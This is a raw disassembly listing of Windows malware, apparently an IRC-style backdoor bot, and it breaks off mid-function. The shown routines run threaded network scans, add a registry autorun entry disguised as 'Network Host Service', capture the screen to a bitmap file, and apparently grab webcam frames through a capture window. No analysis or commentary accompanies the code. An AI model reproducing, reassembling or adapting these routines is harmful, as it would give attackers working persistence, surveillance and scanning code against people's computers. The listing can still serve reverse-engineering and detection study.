lea eax, [ebp+var_1CC]
push offset aScanFailedToIn ; "[SCAN]: Failed to initialize critical s"...
push eax
call sub_416905
xor ebx, ebx
cmp [ebp+var_10], ebx
pop ecx
pop ecx
jnz short loc_401C1D
push ebx
push [ebp+var_14]
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_405D20
add esp, 14h
loc_401C1D: ; CODE XREF: sub_401B65+99�j
lea eax, [ebp+var_1CC]
push eax
call sub_401ECD
pop ecx
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
; ---------------------------------------------------------------------------
loc_401C33: ; CODE XREF: sub_401B65+63�j
; sub_401B65+7F�j
mov eax, [ebp+var_2C]
mov esi, dword_422000
mov dword_4331C4[eax*8], ebx
mov edi, ebx
xor ebx, ebx
cmp [ebp+var_20], 1
jb loc_401CF5
loc_401C51: ; CODE XREF: sub_401B65+18A�j
push edi
push [ebp+var_2C]
lea eax, [ebp+var_14C]
push [ebp+var_38]
mov [ebp+var_24], edi
push eax
lea eax, [ebp+var_1CC]
push offset aScanSDScanThre ; "[SCAN]: %s:%d, Scan thread: %d, Sub-thr"...
push eax
call sub_416905
push ebx
lea eax, [ebp+var_1CC]
push 9
push eax
call sub_4136B6
mov ecx, [ebp+var_2C]
mov [ebp+var_28], eax
imul eax, 234h
add esp, 24h
push ebx
push ebx
mov dword_43B244[eax], ecx
lea eax, [ebp+var_14C]
push eax
push offset sub_401950
push ebx
push ebx
call dword_422008 ; CreateThread
mov ecx, [ebp+var_28]
imul ecx, 234h
cmp eax, ebx
mov dword_43B254[ecx], eax
jnz short loc_401D0C
call dword_422004 ; RtlGetLastWin32Error
push eax
lea eax, [ebp+var_1CC]
push offset aScanFailedToSt ; "[SCAN]: Failed to start worker thread, "...
push eax
call sub_416905
lea eax, [ebp+var_1CC]
push eax
call sub_401ECD
add esp, 10h
loc_401CE7: ; CODE XREF: sub_401B65+1AC�j
push 1Eh
call esi ; Sleep
inc edi
cmp edi, [ebp+var_20]
jbe loc_401C51
loc_401CF5: ; CODE XREF: sub_401B65+E6�j
cmp [ebp+var_30], ebx
jz short loc_401D1A
mov eax, [ebp+var_30]
imul eax, 0EA60h
push eax
call esi ; Sleep
jmp short loc_401D27
; ---------------------------------------------------------------------------
loc_401D08: ; CODE XREF: sub_401B65+1AA�j
push 1Eh
call esi ; Sleep
loc_401D0C: ; CODE XREF: sub_401B65+159�j
cmp [ebp+var_4], ebx
jz short loc_401D08
jmp short loc_401CE7
; ---------------------------------------------------------------------------
loc_401D13: ; CODE XREF: sub_401B65+1C0�j
push 7D0h
call esi ; Sleep
loc_401D1A: ; CODE XREF: sub_401B65+193�j
mov eax, [ebp+var_2C]
cmp dword_4331C4[eax*8], 1
jz short loc_401D13
loc_401D27: ; CODE XREF: sub_401B65+1A1�j
push [ebp+var_30]
mov eax, [ebp+var_2C]
push [ebp+var_38]
mov eax, dword_4331C0[eax*8]
push eax
call dword_43A420 ; inet_ntoa
push eax
lea eax, [ebp+var_1CC]
push offset aScanFinishedAt ; "[SCAN]: Finished at %s:%d after %d minu"...
push eax
call sub_416905
add esp, 14h
cmp [ebp+var_10], ebx
jnz short loc_401D75
push ebx
push [ebp+var_14]
lea eax, [ebp+var_1CC]
push eax
lea eax, [ebp+var_13C]
push eax
push [ebp+var_3C]
call sub_405D20
add esp, 14h
loc_401D75: ; CODE XREF: sub_401B65+1F1�j
lea eax, [ebp+var_1CC]
push eax
call sub_401ECD
mov eax, [ebp+var_2C]
mov dword_4331C4[eax*8], ebx
mov [esp+20Ch+var_20C], 0BB8h
call esi ; Sleep
push 9
call sub_4138A6
cmp eax, 1
pop ecx
jnz short loc_401DAC
push offset dword_434160
call dword_422024 ; RtlDeleteCriticalSection
loc_401DAC: ; CODE XREF: sub_401B65+23A�j
push [ebp+var_2C]
call sub_41397A
pop ecx
push ebx
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_401B65 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_401DBD proc near ; CODE XREF: sub_409806+3968�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
push edi
xor ebx, ebx
mov edi, offset dword_47FF38
loc_401DC7: ; CODE XREF: sub_401DBD+4D�j
cmp byte ptr [edi], 0
jz short loc_401E0E
mov esi, [esp+0Ch+arg_0]
mov eax, edi
loc_401DD2: ; CODE XREF: sub_401DBD+31�j
mov dl, [eax]
mov cl, dl
cmp dl, [esi]
jnz short loc_401DF4
test cl, cl
jz short loc_401DF0
mov dl, [eax+1]
mov cl, dl
cmp dl, [esi+1]
jnz short loc_401DF4
inc eax
inc eax
inc esi
inc esi
test cl, cl
jnz short loc_401DD2
loc_401DF0: ; CODE XREF: sub_401DBD+1F�j
xor eax, eax
jmp short loc_401DF9
; ---------------------------------------------------------------------------
loc_401DF4: ; CODE XREF: sub_401DBD+1B�j
; sub_401DBD+29�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_401DF9: ; CODE XREF: sub_401DBD+35�j
test eax, eax
jz short loc_401E0E
add edi, 0B8h
inc ebx
cmp edi, offset dword_480AB8
jl short loc_401DC7
jmp short loc_401E4F
; ---------------------------------------------------------------------------
loc_401E0E: ; CODE XREF: sub_401DBD+D�j
; sub_401DBD+3E�j
mov esi, ebx
imul esi, 0B8h
push 2Eh
pop ecx
push 17h
push [esp+10h+arg_0]
lea edx, dword_47FF38[esi]
xor eax, eax
mov edi, edx
push edx
rep stosd
call sub_4169C0
push 9Fh
push [esp+1Ch+arg_4]
lea eax, dword_47FF50[esi]
push eax
call sub_4169C0
add esp, 18h
inc dword_4301A0
loc_401E4F: ; CODE XREF: sub_401DBD+4F�j
pop edi
pop esi
mov eax, ebx
pop ebx
retn
sub_401DBD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401E55 proc near ; CODE XREF: sub_409806+508B�p
var_200 = byte ptr -200h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0
push [ebp+arg_8]
push offset aAliasList ; "-[Alias List]-"
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 14h
xor edi, edi
mov esi, offset dword_47FF38
loc_401E7F: ; CODE XREF: sub_401E55+72�j
cmp byte ptr [esi], 0
jz short loc_401EBA
lea eax, [esi+18h]
push eax
push esi
push edi
push offset aD_SS ; "%d. %s = %s"
lea eax, [ebp+var_200]
push 200h
push eax
call sub_416B5D
push 1
push [ebp+arg_8]
lea eax, [ebp+var_200]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_405D20
add esp, 2Ch
loc_401EBA: ; CODE XREF: sub_401E55+2D�j
add esi, 0B8h
inc edi
cmp esi, offset dword_480AB8
jl short loc_401E7F
pop edi
pop esi
leave
retn
sub_401E55 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401ECD proc near ; CODE XREF: start+BE�p sub_4010CA+6D�p ...
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_A = word ptr -0Ah
var_8 = word ptr -8
var_6 = word ptr -6
var_4 = word ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
push edi
lea eax, [ebp+var_10]
push eax
call dword_422028 ; GetLocalTime
mov ebx, offset dword_438A78
mov edi, 80h
mov esi, offset dword_434A78
loc_401EEF: ; CODE XREF: sub_401ECD+3D�j
cmp byte ptr [ebx], 0
jz short loc_401F06
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_4169C0
add esp, 0Ch
loc_401F06: ; CODE XREF: sub_401ECD+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_401EEF
push [ebp+arg_0]
movzx eax, [ebp+var_4]
push eax
movzx eax, [ebp+var_6]
push eax
movzx eax, [ebp+var_8]
push eax
movzx eax, [ebp+var_10]
push eax
movzx eax, [ebp+var_A]
push eax
movzx eax, [ebp+var_E]
push eax
push offset a_2d_2d4d_2d_2d ; "[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
push edi
push esi
call sub_416B5D
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_401ECD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401F41 proc near ; CODE XREF: sub_4096A7+A4�p
; sub_409806:loc_40CEBE�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
push [ebp+arg_0]
lea eax, [ebp+var_80]
push 80h
push eax
call sub_416BB4
lea eax, [ebp+var_80]
push eax
call sub_401ECD
add esp, 14h
leave
retn
sub_401F41 endp
; =============== S U B R O U T I N E =======================================
sub_401F6D proc near ; CODE XREF: sub_409806+4F7F�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, offset dword_434A78
xor ecx, ecx
loc_401F74: ; CODE XREF: sub_401F6D+13�j
mov [eax], cl
add eax, 80h
cmp eax, offset dword_438A78
jl short loc_401F74
cmp [esp+arg_C], ecx
push esi
mov esi, offset aLogsCleared_ ; "[LOGS]: Cleared."
jnz short loc_401FA4
push ecx
push [esp+8+arg_8]
push esi
push [esp+10h+arg_4]
push [esp+14h+arg_0]
call sub_405D20
add esp, 14h
loc_401FA4: ; CODE XREF: sub_401F6D+1F�j
push esi
call sub_401ECD
pop ecx
pop esi
retn
sub_401F6D endp
; =============== S U B R O U T I N E =======================================
sub_401FAD proc near ; CODE XREF: .text:004147CD�p
; .text:00414A00�p
arg_0 = dword ptr 4
push esi
mov esi, offset dword_434A78
loc_401FB3: ; CODE XREF: sub_401FAD+27�j
cmp byte ptr [esi], 0
jz short loc_401FC8
push [esp+4+arg_0]
push esi
call sub_4076F4
test eax, eax
pop ecx
pop ecx
jnz short loc_401FDA
loc_401FC8: ; CODE XREF: sub_401FAD+9�j
add esi, 80h
cmp esi, offset dword_438A78
jl short loc_401FB3
xor eax, eax
pop esi
retn
; ---------------------------------------------------------------------------
loc_401FDA: ; CODE XREF: sub_401FAD+19�j
xor eax, eax
inc eax
pop esi
retn
sub_401FAD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401FDF proc near ; DATA XREF: sub_409806+5036�o
var_31C = byte ptr -31Ch
var_11C = dword ptr -11Ch
var_118 = byte ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+var_11C]
rep movsd
xor edi, edi
xor edx, edx
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_8], 80h
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_402032
push edx
push [ebp+var_14]
lea eax, [ebp+var_118]
push offset aLogBegin ; "[LOG]: Begin"
push eax
push [ebp+var_11C]
call sub_405D20
add esp, 14h
loc_402032: ; CODE XREF: sub_401FDF+33�j
cmp [ebp+var_98], 0
jz short loc_402052
lea eax, [ebp+var_98]
push eax
call sub_416C92
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_402052
mov [ebp+var_8], eax
loc_402052: ; CODE XREF: sub_401FDF+5A�j
; sub_401FDF+6E�j
and [ebp+arg_0], 0
mov esi, offset dword_434A78
loc_40205B: ; CODE XREF: sub_401FDF+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_4020B5
cmp byte ptr [esi], 0
jz short loc_4020A4
cmp [ebp+var_98], 0
jz short loc_40208A
cmp [ebp+var_4], 0
jnz short loc_40208A
lea eax, [ebp+var_98]
push eax
push esi
call sub_4076F4
test eax, eax
pop ecx
pop ecx
jz short loc_4020A4
loc_40208A: ; CODE XREF: sub_401FDF+90�j
; sub_401FDF+96�j
push edi
push [ebp+var_14]
lea eax, [ebp+var_118]
push esi
push eax
push [ebp+var_11C]
call sub_405D20
add esp, 14h
loc_4020A4: ; CODE XREF: sub_401FDF+87�j
; sub_401FDF+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, offset dword_438A78
jl short loc_40205B
loc_4020B5: ; CODE XREF: sub_401FDF+82�j
lea eax, [ebp+var_31C]
push offset aLogListComplet ; "[LOG]: List complete."
push eax
call sub_416905
xor esi, esi
cmp [ebp+var_10], esi
pop ecx
pop ecx
jnz short loc_4020EF
push esi
push [ebp+var_14]
lea eax, [ebp+var_31C]
push eax
lea eax, [ebp+var_118]
push eax
push [ebp+var_11C]
call sub_405D20
add esp, 14h
loc_4020EF: ; CODE XREF: sub_401FDF+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_401ECD
push [ebp+var_18]
call sub_41397A
pop ecx
pop ecx
push esi
call dword_422010 ; ExitThread
int 3 ; Trap to Debugger
sub_401FDF endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40210D proc near ; CODE XREF: sub_407534+1E�p
; sub_40FAD0+34A�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor ebx, ebx
xor edi, edi
mov esi, offset aNetworkHostSer ; "Network Host Service"
loc_40211D: ; CODE XREF: sub_40210D+6F�j
push ebx
lea eax, [ebp+var_4]
push eax
push ebx
push 0F003Fh
push ebx
push ebx
push ebx
push off_42E4F4[edi]
push dword_42E4F0[edi]
call dword_43A3E8 ; RegCreateKeyExA
mov eax, [ebp+arg_0]
cmp eax, ebx
jz short loc_402163
lea edx, [eax+1]
loc_402147: ; CODE XREF: sub_40210D+3F�j
mov cl, [eax]
inc eax
cmp cl, bl
jnz short loc_402147
sub eax, edx
push eax
push [ebp+arg_0]
push 1
push ebx
push esi
push [ebp+var_4]
call dword_43A380 ; RegSetValueExA
jmp short loc_40216D
; ---------------------------------------------------------------------------
loc_402163: ; CODE XREF: sub_40210D+35�j
push esi
push [ebp+var_4]
call dword_43A3DC ; RegDeleteValueA
loc_40216D: ; CODE XREF: sub_40210D+54�j
push [ebp+var_4]
call dword_43A480 ; RegCloseKey
add edi, 8
cmp edi, 18h
jb short loc_40211D
pop edi
pop esi
pop ebx
leave
retn
sub_40210D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame fpd=74h
sub_402183 proc near ; CODE XREF: sub_409806+3ABA�p
var_484 = byte ptr -484h
var_84 = dword ptr -84h
var_80 = dword ptr -80h
var_7C = dword ptr -7Ch
var_78 = word ptr -78h
var_76 = word ptr -76h
var_74 = dword ptr -74h
var_70 = dword ptr -70h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_64 = dword ptr -64h
var_60 = dword ptr -60h
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = word ptr -4Ch
var_4A = word ptr -4Ah
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_2A = word ptr -2Ah
var_28 = word ptr -28h
var_26 = dword ptr -26h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
lea ebp, [esp-74h]
sub esp, 484h
push esi
push edi
xor esi, esi
push esi
push esi
push esi
push offset aDisplay ; "DISPLAY"
call dword_43A4E4 ; CreateDCA
mov edi, eax
cmp edi, esi
mov [ebp+74h+var_20], edi
jnz short loc_4021B0
xor eax, eax
jmp loc_4023B9
; ---------------------------------------------------------------------------
loc_4021B0: ; CODE XREF: sub_402183+24�j
push ebx
push 8
push edi
call dword_43A410 ; GetDeviceCaps
push 0Ah
push edi
mov [ebp+74h+var_C], eax
call dword_43A410 ; GetDeviceCaps
push 0Ch
push edi
mov [ebp+74h+var_4], eax
call dword_43A410 ; GetDeviceCaps
cmp eax, 8
mov [ebp+74h+var_10], eax
ja short loc_4021EA
push 18h
push edi
call dword_43A410 ; GetDeviceCaps
mov ebx, 100h
jmp short loc_4021EC
; ---------------------------------------------------------------------------
loc_4021EA: ; CODE XREF: sub_402183+55�j
xor ebx, ebx
loc_4021EC: ; CODE XREF: sub_402183+65�j
push edi
call dword_43A418 ; CreateCompatibleDC
cmp eax, esi
mov [ebp+74h+var_8], eax
jz loc_40239B
mov eax, [ebp+74h+var_C]
mov [ebp+74h+var_80], eax
mov eax, [ebp+74h+var_4]
mov [ebp+74h+var_7C], eax
mov ax, word ptr [ebp+74h+var_10]
push esi
push esi
mov [ebp+74h+var_76], ax
lea eax, [ebp+74h+var_18]
push eax
push 1
lea eax, [ebp+74h+var_84]
push eax
push edi
mov [ebp+74h+var_84], 28h
mov [ebp+74h+var_78], 1
mov [ebp+74h+var_74], esi
mov [ebp+74h+var_70], esi
mov [ebp+74h+var_6C], esi
mov [ebp+74h+var_68], esi
mov [ebp+74h+var_64], ebx
mov [ebp+74h+var_60], ebx
call dword_43A4B4 ; CreateDIBSection
cmp eax, esi
mov [ebp+74h+var_1C], eax
jz loc_4023A6
push eax
push [ebp+74h+var_8]
call dword_43A32C ; SelectObject
cmp eax, esi
jz loc_4023A6
cmp eax, 0FFFFFFFFh
jz loc_4023A6
push 0CC0020h
push esi
push esi
push edi
push [ebp+74h+var_4]
push [ebp+74h+var_C]
push esi
push esi
push [ebp+74h+var_8]
call dword_43A428 ; BitBlt
test eax, eax
jz loc_4023A6
cmp ebx, esi
jz short loc_4022A3
lea eax, [ebp+74h+var_484]
push eax
push ebx
push esi
push [ebp+74h+var_8]
call dword_43A458 ; GetDIBColorTable
mov ebx, eax
loc_4022A3: ; CODE XREF: sub_402183+10A�j
mov edi, [ebp+74h+var_10]
imul edi, [ebp+74h+var_4]
mov ecx, [ebp+74h+var_C]
imul edi, ecx
push esi
push 80h
push 2
mov eax, ebx
shl eax, 2
mov [ebp+74h+var_C], eax
shr edi, 3
lea edx, [eax+edi+36h]
add eax, 36h
push esi
mov [ebp+74h+var_26], eax
mov eax, [ebp+74h+var_4]
push esi
push 40000000h
push [ebp+74h+arg_0]
mov [ebp+74h+var_50], eax
mov ax, word ptr [ebp+74h+var_10]
mov [ebp+74h+var_30], 4D42h
mov [ebp+74h+var_2E], edx
mov [ebp+74h+var_2A], si
mov [ebp+74h+var_28], si
mov [ebp+74h+var_58], 28h
mov [ebp+74h+var_54], ecx
mov [ebp+74h+var_4C], 1
mov [ebp+74h+var_4A], ax
mov [ebp+74h+var_48], esi
mov [ebp+74h+var_44], esi
mov [ebp+74h+var_40], esi
mov [ebp+74h+var_3C], esi
mov [ebp+74h+var_38], ebx
mov [ebp+74h+var_34], esi
call dword_422034 ; CreateFileA
cmp eax, 0FFFFFFFFh
mov [ebp+74h+var_4], eax
jz short loc_402386
push esi
lea ecx, [ebp+74h+var_14]
push ecx
push 0Eh
lea ecx, [ebp+74h+var_30]
push ecx
push eax
call dword_422030 ; WriteFile
push esi
lea eax, [ebp+74h+var_14]
push eax
push 28h
lea eax, [ebp+74h+var_58]
push eax
push [ebp+74h+var_4]
call dword_422030 ; WriteFile
cmp ebx, esi
jz short loc_402368
push esi
lea eax, [ebp+74h+var_14]
push eax
push [ebp+74h+var_C]
lea eax, [ebp+74h+var_484]
push eax
push [ebp+74h+var_4]
call dword_422030 ; WriteFile
loc_402368: ; CODE XREF: sub_402183+1CB�j
push esi
lea eax, [ebp+74h+var_14]
push eax
push edi
push [ebp+74h+var_18]
push [ebp+74h+var_4]
call dword_422030 ; WriteFile
push [ebp+74h+var_4]
call dword_42202C ; CloseHandle
xor esi, esi
inc esi
loc_402386: ; CODE XREF: sub_402183+1A1�j
push [ebp+74h+var_1C]
call dword_43A41C ; DeleteObject
push [ebp+74h+var_8]
call dword_43A3C8 ; DeleteDC
mov edi, [ebp+74h+var_20]
loc_40239B: ; CODE XREF: sub_402183+75�j
push edi
call dword_43A3C8 ; DeleteDC
mov eax, esi
jmp short loc_4023B8
; ---------------------------------------------------------------------------
loc_4023A6: ; CODE XREF: sub_402183+C6�j
; sub_402183+D8�j ...
push edi
call dword_43A3C8 ; DeleteDC
push [ebp+74h+var_8]
call dword_43A3C8 ; DeleteDC
xor eax, eax
loc_4023B8: ; CODE XREF: sub_402183+221�j
pop ebx
loc_4023B9: ; CODE XREF: sub_402183+28�j
pop edi
pop esi
add ebp, 74h
leave
retn
sub_402183 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4023C0 proc near ; CODE XREF: sub_409806+3BE2�p
var_38 = byte ptr -38h
var_24 = dword ptr -24h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 38h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push ebx
push dword_438A78
xor esi, esi
push 78h
push 0A0h
push esi
push esi
push 40000000h
push offset aWindow ; "Window"
call dword_43A3D0
mov edi, eax
cmp edi, esi
mov [ebp+var_8], edi
jnz short loc_4023FE
mov eax, ebx
jmp loc_4025B7
; ---------------------------------------------------------------------------
loc_4023FE: ; CODE XREF: sub_4023C0+35�j
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_40241B
push esi
push [ebp+arg_4]
push 40Ah
push edi
call dword_43A464 ; SendMessageA
jmp short loc_40241D
; ---------------------------------------------------------------------------
loc_40241B: ; CODE XREF: sub_4023C0+47�j
xor eax, eax
loc_40241D: ; CODE XREF: sub_4023C0+59�j
cmp eax, esi
jnz short loc_402428
loc_402421: ; CODE XREF: sub_4023C0+88�j
; sub_4023C0+BC�j
mov esi, ebx
jmp loc_4025AC
; ---------------------------------------------------------------------------
loc_402428: ; CODE XREF: sub_4023C0+5F�j
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_402445
lea eax, [ebp+var_38]
push eax
push 2Ch
push 40Eh
push edi
call dword_43A464 ; SendMessageA
loc_402445: ; CODE XREF: sub_4023C0+71�j
cmp [ebp+var_24], esi
jz short loc_402421
push edi
call dword_43A324 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_40246B
push esi
push esi
push edi
push [ebp+var_8]
call dword_43A464 ; SendMessageA
mov [ebp+var_4], eax
jmp short loc_40246E
; ---------------------------------------------------------------------------
loc_40246B: ; CODE XREF: sub_4023C0+98�j
mov [ebp+var_4], esi
loc_40246E: ; CODE XREF: sub_4023C0+A9�j
push [ebp+var_4]
call sub_416DAF
cmp eax, esi
pop ecx
mov [ebp+var_C], eax
jz short loc_402421
push [ebp+var_4]
call sub_416DAF
mov ebx, eax
cmp ebx, esi
pop ecx
jnz short loc_402495
xor esi, esi
inc esi
jmp loc_4025AC
; ---------------------------------------------------------------------------
loc_402495: ; CODE XREF: sub_4023C0+CB�j
push [ebp+var_8]
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_4024B2
push [ebp+var_C]
push [ebp+var_4]
push edi
push [ebp+var_8]
call dword_43A464 ; SendMessageA
loc_4024B2: ; CODE XREF: sub_4023C0+E0�j
mov ecx, [ebp+var_4]
mov esi, [ebp+var_C]
mov eax, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+arg_8]
xor edx, edx
cmp ecx, edx
jg short loc_4024D6
mov ecx, 280h
loc_4024D6: ; CODE XREF: sub_4023C0+10F�j
mov eax, [ebp+arg_C]
cmp eax, edx
jg short loc_4024E2
mov eax, 1E0h
loc_4024E2: ; CODE XREF: sub_4023C0+11B�j
mov edi, [ebp+var_8]
and byte ptr [ebx+28h], 0
and byte ptr [ebx+29h], 0
and byte ptr [ebx+2Ah], 0
and byte ptr [ebx+2Bh], 0
push edi
mov [ebx+4], ecx
mov [ebx+8], eax
mov word ptr [ebx+0Eh], 10h
mov [ebx+14h], edx
mov [ebx+10h], edx
mov [ebx+20h], edx
mov [ebx+24h], edx
mov word ptr [ebx+0Ch], 1
call dword_43A324 ; IsWindow
test eax, eax
mov esi, 42Dh
jz short loc_40252F
push ebx
push [ebp+var_4]
push esi
push edi
call dword_43A464 ; SendMessageA
loc_40252F: ; CODE XREF: sub_4023C0+161�j
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_40254A
push 0
push 0
push 43Dh
push edi
call dword_43A464 ; SendMessageA
loc_40254A: ; CODE XREF: sub_4023C0+178�j
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_402566
push [ebp+arg_0]
push 0
push 419h
push edi
call dword_43A464 ; SendMessageA
loc_402566: ; CODE XREF: sub_4023C0+193�j
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_40257F
push [ebp+var_C]
push [ebp+var_4]
push esi
push edi
call dword_43A464 ; SendMessageA
loc_40257F: ; CODE XREF: sub_4023C0+1AF�j
push [ebp+var_C]
call sub_416C97
push ebx
call sub_416C97
pop ecx
pop ecx
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_4025AA
push 0
push 0
push 40Bh
push edi
call dword_43A464 ; SendMessageA
loc_4025AA: ; CODE XREF: sub_4023C0+1D8�j
xor esi, esi
loc_4025AC: ; CODE XREF: sub_4023C0+63�j
; sub_4023C0+D0�j
push [ebp+var_8]
call dword_43A394 ; DestroyWindow
mov eax, esi
loc_4025B7: ; CODE XREF: sub_4023C0+39�j
pop edi
pop esi
pop ebx
leave
retn
sub_4023C0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4025BC proc near ; CODE XREF: sub_409806+3C9A�p
var_98 = byte ptr -98h
var_84 = dword ptr -84h
var_6C = dword ptr -6Ch
var_68 = dword ptr -68h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
sub esp, 98h
push ebx
push esi
push edi
xor ebx, ebx
inc ebx
push ebx
push dword_438A78
xor esi, esi
push 78h
push 0A0h
push esi
push esi
push 40000000h
push offset aWindow ; "Window"
call dword_43A3D0
mov edi, eax
cmp edi, esi
mov [ebp+var_8], edi
jnz short loc_4025FD
mov eax, ebx
jmp loc_402811
; ---------------------------------------------------------------------------
loc_4025FD: ; CODE XREF: sub_4025BC+38�j
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_40261A
push esi
push [ebp+arg_4]
push 40Ah
push edi
call dword_43A464 ; SendMessageA
jmp short loc_40261C
; ---------------------------------------------------------------------------
loc_40261A: ; CODE XREF: sub_4025BC+4A�j
xor eax, eax
loc_40261C: ; CODE XREF: sub_4025BC+5C�j
cmp eax, esi
jnz short loc_402627
loc_402620: ; CODE XREF: sub_4025BC+91�j
; sub_4025BC+C5�j
mov edi, ebx
jmp loc_402806
; ---------------------------------------------------------------------------
loc_402627: ; CODE XREF: sub_4025BC+62�j
push edi
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_402647
lea eax, [ebp+var_98]
push eax
push 2Ch
push 40Eh
push edi
call dword_43A464 ; SendMessageA
loc_402647: ; CODE XREF: sub_4025BC+74�j
cmp [ebp+var_84], esi
jz short loc_402620
push edi
call dword_43A324 ; IsWindow
test eax, eax
mov edi, 42Ch
jz short loc_402670
push esi
push esi
push edi
push [ebp+var_8]
call dword_43A464 ; SendMessageA
mov [ebp+var_4], eax
jmp short loc_402673
; ---------------------------------------------------------------------------
loc_402670: ; CODE XREF: sub_4025BC+A1�j
mov [ebp+var_4], esi
loc_402673: ; CODE XREF: sub_4025BC+B2�j
push [ebp+var_4]
call sub_416DAF
cmp eax, esi
pop ecx
mov [ebp+var_C], eax
jz short loc_402620
push [ebp+var_4]
call sub_416DAF
mov ebx, eax
cmp ebx, esi
pop ecx
jnz short loc_40269A
xor edi, edi
inc edi
jmp loc_402806
; ---------------------------------------------------------------------------
loc_40269A: ; CODE XREF: sub_4025BC+D4�j
push [ebp+var_8]
call dword_43A324 ; IsWindow
test eax, eax
jz short loc_4026B7
push [ebp+var_C]
push [ebp+var_4]
push edi
push [ebp+var_8]
call dword_43A464 ; SendMessageA
loc_4026B7: ; CODE XREF: sub_4025BC+E9�j
mov ecx, [ebp+var_4]
mov esi, [ebp+var_C]
mov eax, ecx
shr ecx, 2
mov edi, ebx
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
mov ecx, [ebp+arg_C]
xor edi, edi
cmp ecx, edi
jg short loc_4026DB
mov ecx, 0A0h
loc_4026DB: ; CODE XREF: sub_4025BC+118�j
mov eax, [ebp+arg_10]
cmp eax, edi
jg short loc_4026E5
push 78h
pop eax
loc_4026E5: ; CODE XREF: sub_4025BC+124�j
mov esi, [ebp+var_8]
and byte ptr [ebx+28h], 0
and byte ptr [ebx+29h], 0
and byte ptr [ebx+2Ah], 0
and byte ptr [ebx+2Bh], 0
push esi
mov [ebx+4], ecx
mov [ebx+8], eax
mov word ptr [ebx+0Eh], 10h
mov [ebx+14h], edi
mov [ebx+10h], edi
mov [ebx+20h], edi
mov [ebx+24h], edi
mov word ptr [ebx+0Ch], 1
